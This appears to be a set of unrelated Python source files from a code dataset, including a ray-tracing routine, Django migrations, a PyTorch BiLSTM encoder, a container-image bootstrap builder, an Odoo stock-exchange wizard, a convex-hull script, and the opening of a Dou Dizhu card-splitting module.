        # 1-element array is that element, behaviour is unchanged.)
        k, l = k[len(k)//2], l[len(l)//2]

        if E[k, l] < v_tol or dtheta < h_tol or dphi < h_tol:
            # NOTE(review): with the default h_tol=330 (radian spacings start
            # at ~0.017) the angular tests are true on the first pass, so the
            # refinement branch below never runs -- confirm the intended
            # units of h_tol.
            if E[k, l] < v_tol:
                # Re-march the accepted ray to record its trace points.
                # NOTE(review): X and Y are not reset before this second
                # march, so they keep the totals accumulated above --
                # confirm the trace coordinates are meant to include that
                # offset.
                trace = [[supra_pos[0], supra_pos[1], supra_pos[2]]]
                a, b = np.cos(Phi), np.sin(Phi)
                last_z = 0
                for i in range(n_layers - 1):

                    s2 = s[i]**2
                    delz = z[i + 1] - z[i]

                    if wind:
                        U = np.tile(u[i, :], (n_theta, 1))
                        V = np.tile(v[i, :], (n_theta, 1))

                        p2 = p/(1 - p*U)

                        A = delz/np.sqrt(s2 - p2**2)
                        if np.isnan(A).all():
                            break

                        X += (p2 + s2*U)*A
                        Y += s2*V*A
                        last_z = i + 1
                    else:
                        X += p*(delz)/(np.sqrt(s2 - p**2))
                        last_z = i + 1

                    # Transform back to true positions and store the point.
                    x = supra_pos[0] + np.cos(Phi)*X + np.cos(Phi + np.pi/2)*Y
                    y = supra_pos[1] + np.sin(Phi)*X + np.sin(Phi + np.pi/2)*Y
                    trace.append([x[k, l], y[k, l], z[n_layers - 1 - last_z]])

                found = True
            else:
                # No candidate lands within tolerance.
                return np.array([np.nan, np.nan, np.nan, np.nan, np.nan])
        else:
            # Refinement: the minimum becomes the centre of the next net,
            # with borders one spacing away. Reduce evenly in both axes.
            n_phi = n_theta

            if ((theta[k] != np.pi/2) and (theta[k] != np.pi)):
                # General case: takeoff strictly between 90 and 180 degrees.
                phi = np.linspace(phi[l] - dphi, phi[l] + dphi, n_phi)
                dphi = 2*dphi/n_phi

                # Takeoff must stay at or above 90 degrees.
                if theta[k] - dtheta < np.pi/2:
                    theta = np.linspace(np.pi/2, theta[k] + 2*dtheta, n_theta)
                else:
                    theta = np.linspace(theta[k] - dtheta, theta[k] + dtheta, n_theta)
                dtheta = 2*dtheta/n_theta

            elif (theta[k] == np.pi):
                # Vertical takeoff: azimuth is unconstrained, span the circle.
                phi = np.linspace(0, 2*np.pi - dphi, n_phi)
                dphi = dphi/n_phi

                theta = np.linspace(theta[k] - dtheta, theta[k], n_theta)
                dtheta = dtheta/n_theta

            elif (theta[k] == np.pi/2):
                # Horizontal takeoff: only search upward of 90 degrees.
                phi = np.linspace(phi[l] - dphi, phi[l] + dphi, n_phi)
                dphi = 2*dphi/n_phi

                theta = np.linspace(np.pi/2, theta[k] + 2*dtheta, n_theta)
                dtheta = dtheta/n_theta/2

            # Recompute the wind projections and the ray-parameter net on
            # the refined grid before the next pass.
            u = nwDir(z_profile[:, 2], z_profile[:, 3], phi)
            v = nwDir(z_profile[:, 2], z_profile[:, 3], phi + np.pi/2)

            n_theta = len(theta)
            n_phi = len(phi)

            Phi = np.tile(phi, (n_theta, 1))
            Theta = np.tile(theta, (n_phi, 1)).T
            u0 = np.tile(u[0, :], (n_theta, 1))

            X = np.zeros((n_theta, n_phi))
            Y = np.zeros((n_theta, n_phi))
            p = s_val*np.sin(Theta)/(1 + u0*np.sin(Theta)*s_val)

    # Final azimuth: rotate 90 degrees CCW and mirror to a compass bearing.
    azimuth = (450 - phi[l]*180/np.pi) % 360
    # Final takeoff angle in degrees.
    takeoff = (theta[k]*180/np.pi) % 360

    p1 = p[k, l]
    p2 = p[k, l]**2

    # Equation (9): sum the travel-time contribution of each traversed layer.
    for i in range(n_layers - 1 - n_layers + last_z):
        s2 = s[i]**2
        t_arrival += (s2/np.sqrt(s2 - p2/(1 - p1*u[i, l])**2))*(z[i + 1] - z[i])

    return t_arrival, azimuth, takeoff, E[k, l], trace
if __name__ == '__main__':
    # Smoke test: trace from 2 km altitude to a nearby ground station.
    s = np.array([0, 0, 2])
    d = np.array([0, 1.4, 0])

    z_profile = np.array([[0, 330, 1, 45],
                          [0.33, 320, 2, 45],
                          [0.67, 315, 2, 45],
                          [1.00, 310, 1, 42],
                          [1.33, 300, 4, 35],
                          [1.67, 293, 5, 30],
                          [2.00, 295, 10, 15]])

    # Note: the unpacking rebinds d (detector position) to the error value.
    a, b, c, d, e = cyscan(s, d, z_profile)
    print(e)
1753775 | # -*- coding: utf-8 -*-
from .action import Action, InitializableAction
from ..registry import Registry
# Module-level registry holding the known Action implementations.
actions = Registry(Action, "Action")  # type: Registry[Action]
| StarcoderdataPython |
9703293 | <gh_stars>0
import os
import json
class GenericDatabase:
    """Tiny JSON-file-backed key/value store.

    The backing file must already exist and contain a JSON object; it is
    loaded into memory on construction and rewritten on every update.
    """

    def __init__(self, file_path):
        # Resolve the path relative to the current working directory.
        self.path = os.path.join(os.getcwd(), file_path)
        self.update()

    def update(self):
        """Reload the in-memory cache from the backing file."""
        with open(self.path, "r") as file:
            self.data = json.load(file)

    def set(self, name, value):
        """Update an existing key and persist the whole store to disk.

        Keys not already present are ignored (preserving the original
        contract of only updating known keys).
        """
        # Membership test rather than truthiness: the original
        # `self.data.get(name)` check silently refused to update keys whose
        # current value was falsy (0, "", None, ...).
        if name in self.data:
            self.data[name] = value
            with open(self.path, "w") as file:
                json.dump(self.data, file)

    def get(self, name):
        """Return the cached value for *name*, or None if missing."""
        return self.data.get(name)
| StarcoderdataPython |
8138807 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
    # Auto-generated schema migration: introduces the Results table and
    # removes the Question/Choice/Answer models it replaces. Migration files
    # are executed by Django's migrate machinery; avoid hand-editing the
    # operations once this has been applied anywhere.

    dependencies = [
        ('cassette', '0002_auto_20150717_1112'),
    ]

    operations = [
        migrations.CreateModel(
            name='Results',
            fields=[
                ('id', models.AutoField(serialize=False, auto_created=True, primary_key=True, verbose_name='ID')),
                ('sequenceLength', models.CharField(max_length=1000000)),
                ('donorSequence', models.CharField(max_length=1000000)),
                ('Lup', models.CharField(max_length=1000000)),
                ('Rup', models.CharField(max_length=1000000)),
                ('Ldown', models.CharField(max_length=1000000)),
                ('Rdown', models.CharField(max_length=1000000)),
                ('L', models.CharField(max_length=1000000)),
                ('R', models.CharField(max_length=1000000)),
            ],
        ),
        migrations.RemoveField(
            model_name='answer',
            name='question',
        ),
        migrations.RemoveField(
            model_name='choice',
            name='question',
        ),
        migrations.DeleteModel(
            name='Answer',
        ),
        migrations.DeleteModel(
            name='Choice',
        ),
        migrations.DeleteModel(
            name='Question',
        ),
    ]
| StarcoderdataPython |
11294531 | <gh_stars>0
import torch
from torch.autograd import Variable
import torch.nn as nn
from torch.nn import init
hasCuda = torch.cuda.is_available()
class Encoder(nn.Module):
    """
    Bi-directional LSTM encoder over input character vectors.

    Runs a single-layer BiLSTM over the embedded source sequence, then a
    dense layer + tanh to build the final hidden vector of each step, with
    padded positions masked out.
    """

    def __init__(self, cfg):
        super(Encoder, self).__init__()
        self.cfg = cfg

        # Size of the input character vectors.
        in_size = cfg.src_em_size

        self.src_rnn = nn.LSTM(
            input_size=in_size,
            hidden_size=cfg.h_units,
            num_layers=1,
            bias=True,
            batch_first=True,
            dropout=0.0,
            bidirectional=True
        )

        # Projects the concatenated forward/backward states back to h_units.
        self.dense = nn.Linear(
            2 * cfg.h_units,
            cfg.h_units,
            bias=True
        )

        self.drop = nn.Dropout(cfg.dropout)

        # self.src_em is created in embeddings(), after param_init() runs,
        # so Xavier initialization never touches the pretrained table.
        self.param_init()
        self.embeddings()
        return

    def param_init(self):
        """Initialize biases to zero and weights with Xavier-uniform."""
        for name, param in self.named_parameters():
            if 'bias' in name:
                init.constant(param, 0.0)
            if 'weight' in name:
                init.xavier_uniform(param)
        return

    def embeddings(self):
        """Add the embedding layer that maps character ids to vectors."""
        cfg = self.cfg
        # Pretrained source lookup table.
        src_lt = torch.FloatTensor(cfg.data['src_vec'])
        self.src_em = nn.Embedding(cfg.src_alphabet_size, cfg.src_em_size)
        self.src_em.weight.data.copy_(src_lt)
        # The padding id embeds to the zero vector.
        self.src_em.weight.data[cfg.src_pad_id].fill_(0.0)
        self.src_em.weight.requires_grad = True
        return

    def forward(self):
        """Encode the current batch (read from cfg.B) into per-step hidden vectors."""
        cfg = self.cfg

        # Re-zero the pad embedding in case a gradient step changed it.
        self.src_em.weight.data[cfg.src_pad_id].fill_(0.0)

        # Batch tensors; assumes cfg.B['x'] / cfg.B['x_mask'] are
        # (batch, max_length) id / mask tensors -- TODO confirm against the
        # data loader.
        x_mask = Variable(cfg.B['x_mask'].cuda()) if hasCuda else Variable(cfg.B['x_mask'])

        x = Variable(cfg.B['x'].cuda()) if hasCuda else Variable(cfg.B['x'])

        # Zero initial hidden/cell states: (2 directions, batch, h_units).
        zeros = torch.zeros(2, cfg.d_batch_size, cfg.h_units)
        h0 = Variable(zeros.cuda()) if hasCuda else Variable(zeros)

        x_ems = self.src_em(x)

        # Bi-directional RNN over the embedded sequence.
        outputs, _ = self.src_rnn(x_ems, (h0, h0))
        outputs_dr = self.drop(outputs)

        HH = self.dense(outputs_dr)

        # tanh non-linear layer; H holds the final hidden vector of each step.
        H = nn.functional.tanh(HH)

        # Zero out padded positions before returning.
        return H * x_mask.view(-1, cfg.max_length, 1).expand(-1, cfg.max_length, cfg.h_units)
| StarcoderdataPython |
6622120 | <filename>python3/koans/a_package_folder/__init__.py
#!/usr/bin/env python
# Module-level constant the koan exercises import to demonstrate package attributes.
an_attribute = 1984
11335699 | <filename>tests/__init__.py<gh_stars>0
"""Unit test package for smartgarden_x."""
| StarcoderdataPython |
"""Copy the .bmp images that have a matching annotation .xml file.

For every ``<name>.xml`` in the annotations directory, ``<name>.bmp`` is
copied from the source image directory into the destination directory.
"""
import glob
import os
import shutil

srcdir = r'D:\dong\wafer-data\data_bmp'
seldir = r'C:\Users\user\PycharmProjects\yolov3\VOC2007\Annotations'
dstdir = r'C:\Users\user\PycharmProjects\yolov3\VOC2007\JPEGImages'


def copy_annotated_images(src_dir, sel_dir, dst_dir):
    """Copy every image whose annotation exists; return the copied file names.

    :param src_dir: directory containing the ``.bmp`` images
    :param sel_dir: directory containing the ``.xml`` annotations
    :param dst_dir: directory the selected images are copied into
    :return: list of copied ``.bmp`` file names (basename only)
    """
    copied = []
    for xml_path in glob.glob(os.path.join(sel_dir, '*.xml')):
        # Swap the extension robustly instead of slicing off 3 characters.
        stem = os.path.splitext(os.path.basename(xml_path))[0]
        bmp_name = stem + '.bmp'
        src_file = os.path.join(src_dir, bmp_name)
        print(src_file)
        shutil.copy(src_file, os.path.join(dst_dir, bmp_name))
        copied.append(bmp_name)
    return copied


# Preserve the original script behaviour: run the copy on import/execution.
copy_annotated_images(srcdir, seldir, dstdir)
3429457 | <gh_stars>0
# Generated by Django 3.0.4 on 2020-04-19 01:57
from django.db import migrations, models
class Migration(migrations.Migration):
    """Add the ``Tab`` model (stored in the explicit ``blog_tab`` table)."""

    dependencies = [
        ('blog', '0005_remove_category_status'),
    ]
    operations = [
        migrations.CreateModel(
            name='Tab',
            fields=[
                ('id', models.BigAutoField(primary_key=True, serialize=False)),
                ('name', models.CharField(max_length=254)),
                # Display order of the tab; defaults to 1.
                ('index', models.SmallIntegerField(default=1)),
                ('date', models.DateTimeField(auto_now_add=True)),
            ],
            options={
                'db_table': 'blog_tab',
            },
        ),
    ]
| StarcoderdataPython |
11363372 | <filename>seine/bootstrap.py
# seine - Singular Embedded Images Now Easy
# SPDX-License-Identifier Apache-2.0
from abc import ABC, abstractmethod
import os
import subprocess
import tempfile
from seine.utils import ContainerEngine
class Bootstrap(ABC):
    """Base class for bootstrap container-image builders (host and target)."""

    def __init__(self, distro, options):
        # Lazily computed image name; see the ``name`` property below.
        self._name = None
        self.distro = distro
        self.options = options
        super().__init__()

    @abstractmethod
    def create(self):
        """Build the bootstrap image."""
        pass

    @abstractmethod
    def defaultName(self):
        """Return the default container-image name for this bootstrap."""
        pass

    def getName(self):
        # Compute the default name on first access and cache it.
        if self._name is None:
            self._name = self.defaultName()
        return self._name

    def setName(self, name):
        self._name = name

    # Image name; falls back to defaultName() until explicitly set.
    name = property(getName, setName)
class HostBootstrap(Bootstrap):
    """Builds the host-side image holding debootstrap/equivs/qemu tooling."""

    def create(self):
        """Build the host bootstrap image; raises CalledProcessError on failure."""
        # The equivs control file is written to /tmp so the container can
        # read it through the read-only /host-tmp bind mount below.
        equivsfile = tempfile.NamedTemporaryFile(mode="w", delete=False)
        equivsfile.write(EQUIVS_CONTROL_FILE)
        equivsfile.close()
        dockerfile = tempfile.NamedTemporaryFile(mode="w", delete=False)
        dockerfile.write(HOST_BOOTSTRAP_SCRIPT.format(
            self.distro["source"],
            self.distro["release"],
            os.path.basename(equivsfile.name)))
        dockerfile.close()
        try:
            ContainerEngine.run([
                "build", "--rm", "--squash",
                "-t", self.name, "-f", dockerfile.name,
                "-v", "/tmp:/host-tmp:ro"],
                check=True)
        except subprocess.CalledProcessError:
            raise
        finally:
            # Always clean up dangling layers and the temp files, even on failure.
            ContainerEngine.run(["image", "prune", "-f"])
            os.unlink(dockerfile.name)
            os.unlink(equivsfile.name)
        return self

    def defaultName(self):
        """Return e.g. ``bootstrap/debian/buster/all``."""
        return os.path.join("bootstrap", self.distro["source"], self.distro["release"], "all")
class TargetBootstrap(Bootstrap):
    """Builds the target root filesystem image via qemu-debootstrap."""

    def create(self, hostBootstrap):
        """Build the target bootstrap image on top of *hostBootstrap*'s image."""
        self.hostBootstrap = hostBootstrap
        dockerfile = tempfile.NamedTemporaryFile(mode="w", delete=False)
        dockerfile.write(TARGET_BOOTSTRAP_SCRIPT.format(
            self.hostBootstrap.name,
            self.distro["architecture"],
            self.distro["release"],
            self.distro["uri"]
        ))
        dockerfile.close()
        try:
            ContainerEngine.run([
                "build", "--rm",
                "-t", self.name,
                "-f", dockerfile.name], check=True)
        except subprocess.CalledProcessError:
            raise
        finally:
            # Always prune dangling layers and remove the temp Dockerfile.
            ContainerEngine.run(["image", "prune", "-f"])
            os.unlink(dockerfile.name)
        return self

    def defaultName(self):
        """Return e.g. ``bootstrap/debian/buster/armhf``."""
        return os.path.join(
            "bootstrap",
            self.distro["source"],
            self.distro["release"],
            self.distro["architecture"])
HOST_BOOTSTRAP_SCRIPT = """
FROM {0}:{1} AS base
RUN \
apt-get update -qqy && \
apt-get install -qqy --no-install-recommends \
debootstrap equivs qemu-user-static && \
mkdir -p /opt/seine && \
cd /opt/seine && \
equivs-build /host-tmp/{2} && \
apt-get autoremove -qqy equivs && \
apt-get clean -qqy
FROM base AS clean-base
RUN rm -rf /usr/share/doc \
/usr/share/info \
/usr/share/man
"""
TARGET_BOOTSTRAP_SCRIPT = """
FROM {0} AS bootstrap
RUN \
export container=lxc; \
qemu-debootstrap --variant=minbase --arch {1} {2} rootfs {3} && \
cp /usr/bin/qemu-*-static rootfs/usr/bin/ && \
echo 'APT::Install-Recommends "false";' \
>rootfs/etc/apt/apt.conf.d/00-no-recommends && \
echo 'APT::Install-Suggests "false";' \
>rootfs/etc/apt/apt.conf.d/00-no-suggests
FROM scratch AS base
COPY --from=bootstrap rootfs/ /
RUN apt-get clean -qqy && \
rm -rf /usr/share/doc /usr/share/info /usr/share/man
"""
EQUIVS_CONTROL_FILE = """
Section: misc
Priority: optional
Standards-Version: 3.9.2
Package: seine-ansible
Depends: ansible, python3-apt
Architecture: all
Description: dependencies for seine
"""
| StarcoderdataPython |
1812418 | <reponame>umar3ziz/bloopark
# -*- coding: utf-8 -*-
#################################################################################
# Author : <NAME> <<EMAIL>>
# Copyright(c): Developer -<NAME>-
# All Rights Reserved.
#
# This program is copyright property of the author mentioned above.
# You can`t redistribute it and/or modify it.
#################################################################################
""" Wizards to enable Exchanges"""
from odoo import api, fields, models, _
from odoo.addons import decimal_precision as dp
from odoo.exceptions import UserError
from odoo.tools.float_utils import float_round, float_is_zero
class StockExchangeLine(models.TransientModel):
    """One exchangeable product line of the exchange wizard."""
    _name = "stock.exchange.line"
    _rec_name = 'product_id'
    _description = 'Exchange Picking Line'

    # NOTE(review): the domain references product_id on itself — presumably it
    # pins the field to the originally delivered product; confirm intent.
    product_id = fields.Many2one(
        'product.product', string="Product",
        required=True, domain="[('id', '=', product_id)]"
    )
    # Replacement product; must differ from the delivered one.
    exchange_product_id = fields.Many2one(
        'product.product', string="Exchange Product",
        required=False, domain="[('id', '!=', product_id)]"
    )
    quantity = fields.Float(
        "Quantity", digits=dp.get_precision('Product Unit of Measure'), required=True
    )
    price_unit = fields.Float(
        string='Unit Price', required=False,
        digits=dp.get_precision('Product Price')
    )
    currency_id = fields.Many2one('res.currency')
    price_subtotal = fields.Monetary(
        compute='_compute_amount',
        string='Subtotal',
        readonly=True, store=True
    )
    uom_id = fields.Many2one('uom.uom', string='Unit of Measure')
    exchange_id = fields.Many2one('stock.exchange', string="Wizard")
    move_id = fields.Many2one('stock.move', "Move")

    @api.depends('quantity', 'price_unit')
    def _compute_amount(self):
        """
        Compute the subtotal to be able to compare the exchanged prices.
        """
        for line in self:
            line.update({
                'price_subtotal': line.price_unit * line.quantity,
            })

    @api.onchange('exchange_product_id')
    def _onchange_exchange_product(self):
        """ Onchange exchange_product_id to get line values """
        values = {
            'quantity': False,
            'price_unit': False,
            'uom_id': False,
        }
        # The exchange originates from either a sale line or a purchase line.
        line = self.move_id.sale_line_id or self.move_id.purchase_line_id
        if self.exchange_product_id:
            # Price/UoM come from the replacement product.
            values.update({
                'quantity': self.move_id.product_uom_qty,
                'price_unit': self.exchange_product_id.lst_price,
                'uom_id': self.exchange_product_id.uom_id.id,
            })
        else:
            # No replacement chosen: fall back to the original line values.
            values.update({
                'quantity': self.move_id.product_uom_qty,
                'price_unit': line.price_unit,
                'uom_id': line.product_uom.id,
            })
        self.update(values)
class StockExchange(models.TransientModel):
    """Wizard that creates an exchange picking (and invoices) for a done delivery."""
    _name = 'stock.exchange'
    _description = 'Delivery Exchange'

    picking_id = fields.Many2one('stock.picking')
    exchange_line_ids = fields.One2many('stock.exchange.line', 'exchange_id', 'Moves')
    location_id = fields.Many2one(
        'stock.location', 'Exchange Location',
        domain="['|', ('exchange_location', '=', True), ('return_location', '=', True)]"
    )

    @api.model
    def default_get(self, fields):
        """
        Override to set default values for the new exchange lines
        """
        if len(self.env.context.get('active_ids', list())) > 1:
            raise UserError(_("You may only exchange one picking at a time."))
        res = super(StockExchange, self).default_get(fields)
        exchange_line_ids = []
        picking = self.env['stock.picking'].browse(self.env.context.get('active_id'))
        if picking:
            res.update({'picking_id': picking.id})
            if picking.state != 'done':
                raise UserError(_("You may only exchange Done pickings."))
            for move in picking.move_lines:
                # Scrapped or already-exchanged moves cannot be exchanged again.
                if move.scrapped or move.exchanged:
                    continue
                # Remaining quantity = delivered qty minus what destination
                # moves already consumed.
                quantity = move.product_qty - sum(
                    move.move_dest_ids.filtered(
                        lambda m: m.state in ['partially_available', 'assigned', 'done']
                    ).mapped('move_line_ids').mapped('product_qty')
                )
                quantity = float_round(
                    quantity, precision_rounding=move.product_uom.rounding
                )
                # exchange should be from sale or purchase
                line = move.sale_line_id or move.purchase_line_id
                if line:
                    exchange_line_ids.append(
                        (0, 0, {
                            'product_id': move.product_id.id,
                            'quantity': quantity,
                            'move_id': move.id,
                            'price_unit': line.price_unit,
                            'uom_id': move.product_uom.id,
                            'price_subtotal': quantity * line.price_unit,
                            'currency_id': line.currency_id.id
                        })
                    )
            if not exchange_line_ids:
                raise UserError(_(
                    "No products to exchange (only lines in Done state and not fully "
                    "exchanged yet can be exchange)."
                ))
            if 'exchange_line_ids' in fields:
                res.update({'exchange_line_ids': exchange_line_ids})
            if 'location_id' in fields:
                # Prefer the exchange picking type's destination when it is
                # flagged as an exchange location.
                location_id = picking.location_id.id
                exchange_picking_type = picking.picking_type_id.exchange_picking_type_id
                dest_location = exchange_picking_type.default_location_dest_id
                if dest_location.exchange_location:
                    location_id = dest_location.id
                res['location_id'] = location_id
        return res

    def _prepare_move_default_values(self, exchange_line, new_picking):
        """
        Prepare new move line dict values
        :param exchange_line: move related Exchange line obj
        :param new_picking: Obj of the new created picking
        :return: Dict of values
        """
        product = exchange_line.exchange_product_id or exchange_line.product_id
        location = self.location_id or exchange_line.move_id.location_id
        vals = {
            'product_id': product.id,
            'product_uom_qty': exchange_line.quantity,
            'product_uom': exchange_line.uom_id.id,
            'picking_id': new_picking.id,
            'state': 'draft',
            'date_expected': fields.Datetime.now(),
            # Reverse direction: ship from the original destination location.
            'location_id': exchange_line.move_id.location_dest_id.id,
            'location_dest_id': location.id,
            'picking_type_id': new_picking.picking_type_id.id,
            'warehouse_id': self.picking_id.picking_type_id.warehouse_id.id,
            'origin_exchange_move_id': exchange_line.move_id.id,
            'procure_method': 'make_to_stock',
        }
        return vals

    def _create_exchanges(self):
        """
        To finalize data and create the Exchanged picking and Invoices if necessary
        :return: Int of the new created picking ID, Int of the picking type ID
        """
        # create new picking for exchanged products; prefer the dedicated
        # exchange type, then the return type, then the original type.
        if self.picking_id.picking_type_id.exchange_picking_type_id:
            picking_type_id = self.picking_id.picking_type_id.exchange_picking_type_id.id
        elif self.picking_id.picking_type_id.return_picking_type_id:
            picking_type_id = self.picking_id.picking_type_id.return_picking_type_id.id
        else:
            picking_type_id = self.picking_id.picking_type_id.id
        moves = self.picking_id.move_ids_without_package
        purchase_lines = moves.mapped('purchase_line_id')
        purchase_order = purchase_lines.mapped('order_id')
        new_picking = self.picking_id.copy({
            'move_lines': [],
            'sale_id': False,
            'picking_type_id': picking_type_id,
            'exchange_sale_id': self.picking_id.sale_id.id,
            'exchange_purchase_id': purchase_order and purchase_order[0].id,
            'state': 'draft',
            'origin': _("Exchange of %s") % self.picking_id.name,
            'location_id': self.picking_id.location_dest_id.id,
            'location_dest_id': self.location_id.id
        })
        # Link the new picking back to its origin in the chatter.
        new_picking.message_post_with_view(
            'mail.message_origin_link', values={
                'self': new_picking, 'origin': self.picking_id
            }, subtype_id=self.env.ref('mail.mt_note').id
        )
        exchanged_lines = 0
        invoices_values = []
        for exchange_line in self.exchange_line_ids:
            if not exchange_line.move_id:
                raise UserError(_(
                    "You have manually created product lines, "
                    "please delete them to proceed."
                ))
            if not float_is_zero(
                    exchange_line.quantity,
                    precision_rounding=exchange_line.uom_id.rounding
            ):
                exchanged_lines += 1
                vals = self._prepare_move_default_values(exchange_line, new_picking)
                move = exchange_line.move_id.copy(vals)
                # Flag the origin move so it cannot be exchanged twice.
                exchange_line.move_id.exchanged = True
                val = {'exchange_move_id': move.id}
                line = move.sale_line_id or move.purchase_line_id
                invoice_value = self._prepare_invoice_lines(exchange_line, line)
                if invoice_value:
                    invoices_values.append(invoice_value)
                line.write(val)
        if not exchanged_lines:
            raise UserError(_("Please specify at least one non-zero quantity."))
        if invoices_values:
            self.action_create_invoices(invoices_values)
        new_picking.action_confirm()
        new_picking.action_assign()
        return new_picking.id, picking_type_id

    def _prepare_invoice_lines(self, exchange_line, order_line):
        """
        Prepare new invoice lines dict values
        :param exchange_line: move related Exchange line obj
        :param order_line: Obj of Sale or purchase line the related to this invoice line
        :return: Dict of values (empty dict when the prices are equal — no
            extra invoice/refund is needed)
        """
        # Maps the order-line model to the invoice types used when the
        # exchange is more expensive ('higher') or cheaper ('lower').
        invoice_type = {
            'sale.order.line': {
                'higher': 'out_invoice', 'lower': 'out_refund',
                'type': 'sale', 'field': 'exchange_sale_line_id'
            },
            'purchase.order.line': {
                'higher': 'in_invoice', 'lower': 'in_refund',
                'type': 'purchase', 'field': 'exchange_purchase_line_id'
            },
        }
        product = exchange_line.exchange_product_id or exchange_line.product_id
        data = {
            'invoice_type': False,
            'values': {
                'product_id': product.id,
                'quantity': exchange_line.quantity,
                'name': 'Exchange for [%s]' % exchange_line.product_id.display_name,
            }
        }
        if exchange_line.exchange_product_id or \
                exchange_line.price_subtotal > order_line.price_subtotal:
            data['invoice_type'] = invoice_type[order_line._name]['higher']
        elif exchange_line.price_subtotal < order_line.price_subtotal:
            data['invoice_type'] = invoice_type[order_line._name]['lower']
        else:
            return {}
        data[invoice_type[order_line._name]['type']] = order_line.order_id
        data['values'][invoice_type[order_line._name]['field']] = order_line.id
        data['values']['price_unit'] = exchange_line.price_unit
        # TODO i think we should take the different between prices NOT the all price
        # abs(exchange_line.price_unit - order_line.price_unit)
        return data

    @api.multi
    def action_create_invoices(self, data):
        """
        Clean the incoming data and specify each line with its invoice types
        :param data: list of values that needed to create invoice lines
        :return: None
        """
        invoice_obj = self.env['account.invoice']
        values = {}
        # Group invoice lines by invoice type so one invoice is created per type.
        for val in data:
            values.setdefault(val['invoice_type'], {
                'order': val.get('sale', val.get('purchase')),
                'values': []
            })
            values[val['invoice_type']]['values'].append((0, 0, val['values']))
        for inv_type, inv_data in values.items():
            # Use a cached record to trigger the partner onchange defaults.
            invoice = invoice_obj.new(self._prepare_invoice(inv_type))
            invoice._onchange_partner_id()
            inv = invoice._convert_to_write({
                name: invoice[name] for name in invoice._cache
            })
            for _, _, line in inv_data['values']:
                line['account_id'] = inv['account_id']
            inv['invoice_line_ids'] = inv_data['values']
            new_invoice = invoice_obj.sudo().create(inv)
            new_invoice.action_invoice_open()
            inv_data['order'].write({
                'exchange_invoice_ids': [(4, new_invoice.id)]
            })

    def _prepare_invoice(self, invoice_type):
        """
        Prepare the dict of values to create the new invoice for a Exchange move.
        """
        return {
            'partner_id': self.picking_id.partner_id.id,
            'company_id': self.picking_id.company_id.id,
            'type': invoice_type,
            'name': _('Exchange Inv for %s') % self.picking_id.name,
            'currency_id': self.env.user.company_id.currency_id.id,
        }

    def create_exchanges(self):
        """
        :return: Action for the final exchange Picking
        """
        for wizard in self:
            new_picking_id, pick_type_id = wizard._create_exchanges()
        # Override the context to disable all the potential filters
        # that could have been set previously
        ctx = dict(self.env.context)
        ctx.update({
            'search_default_picking_type_id': pick_type_id,
            'search_default_draft': False,
            'search_default_assigned': False,
            'search_default_confirmed': False,
            'search_default_ready': False,
            'search_default_late': False,
            'search_default_available': False,
        })
        return {
            'name': _('Exchanged Picking'),
            'view_type': 'form',
            'view_mode': 'form,tree,calendar',
            'res_model': 'stock.picking',
            'res_id': new_picking_id,
            'type': 'ir.actions.act_window',
            'context': ctx,
        }
| StarcoderdataPython |
290756 | #! /usr/bin/env python
# -*- coding: utf-8 -*-
#
# Distributed under terms of the MIT license.
# Copyright 2021 <NAME>.
import sys
import numpy as np
import matplotlib.pyplot as plt
# Function to know if we have a CCW turn
def RightTurn(p1, p2, p3):
    """Return True when the triple p1 -> p2 -> p3 makes a strict right turn.

    Collinear triples count as "not a right turn" and yield False.
    """
    lhs = (p3[1] - p1[1]) * (p2[0] - p1[0])
    rhs = (p2[1] - p1[1]) * (p3[0] - p1[0])
    return lhs < rhs
# Main algorithm:
def GrahamScan(P):
    """Compute the convex hull of 2-D points (Andrew's monotone chain).

    :param P: list of (x, y) tuples; it is sorted in place (as before).
    :return: np.array of the hull vertices in counter-clockwise order,
        starting from the lowest-leftmost point. Collinear boundary points
        are excluded. Degenerate inputs (fewer than 3 points) are returned
        sorted instead of raising IndexError as the original did.
    """
    P.sort()  # Sort the set of points (kept in place for compatibility)
    if len(P) < 3:
        return np.array(P)

    def _is_right_turn(p1, p2, p3):
        # Strict right turn for the triple p1 -> p2 -> p3 (newest point
        # first); collinear triples count as removable, matching the
        # original RightTurn helper.
        return (p3[1] - p1[1]) * (p2[0] - p1[0]) < (p2[1] - p1[1]) * (p3[0] - p1[0])

    # First chain: left-to-right over the sorted points.
    first = [P[0], P[1]]
    for point in P[2:]:
        first.append(point)
        while len(first) > 2 and not _is_right_turn(first[-1], first[-2], first[-3]):
            del first[-2]

    # Second chain: right-to-left back over the points.
    second = [P[-1], P[-2]]
    for point in P[-3::-1]:
        second.append(point)
        while len(second) > 2 and not _is_right_turn(second[-1], second[-2], second[-3]):
            del second[-2]

    # Drop the second chain's endpoints (shared with the first chain).
    return np.array(first + second[1:-1])
def main():
    """Build a random point set, compute its convex hull and plot it."""
    # try:
    #     N = int(sys.argv[1])
    # except:
    #     N = int(input("Introduce N: "))
    N = 100
    # By default we build a random set of N points with coordinates in [0,300)x[0,300):
    P = [(np.random.randint(0, 300), np.random.randint(0, 300)) for i in range(N)]
    L = GrahamScan(P)
    P = np.array(P)

    # Plot the computed Convex Hull:
    plt.figure()
    plt.plot(L[:, 0], L[:, 1], 'b-', picker=5)
    # Close the polygon: join the last hull vertex back to the first.
    plt.plot([L[-1, 0], L[0, 0]], [L[-1, 1], L[0, 1]], 'b-', picker=5)
    plt.plot(P[:, 0], P[:, 1], ".r")
    plt.axis('off')
    plt.show()


if __name__ == '__main__':
    main()
9785615 | # -*- coding: utf-8 -*-
"""
斗地主拆牌模块
@author 江胤佐
"""
from __future__ import annotations
import math
from abc import ABCMeta
from collections import defaultdict
from copy import deepcopy
from functools import cmp_to_key
from typing import Optional
from duguai.card.cards import *
from duguai.card.cards import card_lt2, card_split
from duguai.card.combo import Combo
"""顺子/连对/最小的长度"""
# Minimum chain length: solo chains (kind 1) need 5 cards, pair chains (kind 2) need 3.
KIND_TO_MIN_LEN = {1: 5, 2: 3}
# Sentinel q-value for an action that empties the hand (always preferred).
MAX_Q = 10000
def _most_value(x):
return np.argmax(np.bincount(x))
# Sort key: order actions by their largest card value.
MAX_VALUE_CMP = cmp_to_key(lambda x, y: max(x) - max(y))
# Sort key: order actions by their most frequent card value.
MOST_VALUE_CMP = cmp_to_key(lambda x, y: _most_value(x) - _most_value(y))
class AbstractDecomposer(metaclass=ABCMeta):
    """
    Hand decomposer. Only responsible for finding good card groups in one
    hand; other players' cards are not considered.
    state: the current hand.
    action: the cards about to be played.
